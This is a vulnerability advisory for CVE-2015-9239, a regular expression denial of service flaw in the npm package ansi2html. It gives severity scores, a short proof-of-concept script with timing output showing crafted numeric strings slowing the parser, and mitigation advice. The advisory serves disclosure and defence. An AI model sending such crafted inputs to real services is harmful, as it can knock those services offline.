logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2015-9239 ansi2html

Package

Manager: npm
Name: ansi2html
Vulnerable Version: >=0 <=0.0.1

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:U/RC:R

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00334 pctl0.55653

Details

Regular Expression Denial of Service in ansi2html The `ansi2html` package is affected by a regular expression denial of service vulnerability when certain types of user input is passed in. ## Proof of concept ``` var ansi2html = require('ansi2html') var start = process.hrtime(); ansi2html("[1111111111111111111111;0000000000000000000000"); console.log(process.hrtime(start)); start = process.hrtime(); ansi2html("[1111111111111111111111;00000000000000000000000"); console.log(process.hrtime(start)); start = process.hrtime(); ansi2html("[1111111111111111111111;000000000000000000000000"); console.log(process.hrtime(start)); start = process.hrtime(); ansi2html("[1111111111111111111111;0000000000000000000000000000"); console.log(process.hrtime(start)); ``` Results of the above ``` 00:29:53-adam_baldwin~/tmp$ node test [ 0, 119615367 ] [ 0, 149934565 ] [ 0, 233325677 ] [ 3, 46582479 ] ``` ## Recommendation At the time of this writing, February 2018, all versions of `ansi2html` remain vulnerable, and the package has not been updated for 4 years. In order to use this package safely, it is necessary to avoid passing user input to the package, or to limit the size of the input string to a size with a parse time you find acceptable. Unfortunately, the match time grows at quite a small character count, so it is unlikely for it to both allow strings of a useful size while protecting against the denial of service attack. In the case that user input of significant length must be parsed by ansi2html, the best mitigation is to use an alternative module that is actively maintained and provides similar functionality. There are [multiple modules fitting this criteria available on npm.][available on npm](https://www.npmjs.com/search?q=ansi+html)

Metadata

Created: 2020-09-01T15:17:48Z
Modified: 2021-01-14T15:58:08Z
Source: MANUAL
CWE IDs: ["CWE-400"]
Alternative ID: GHSA-c2v2-7rcg-2ch7
Finding: F002
Auto approve: 1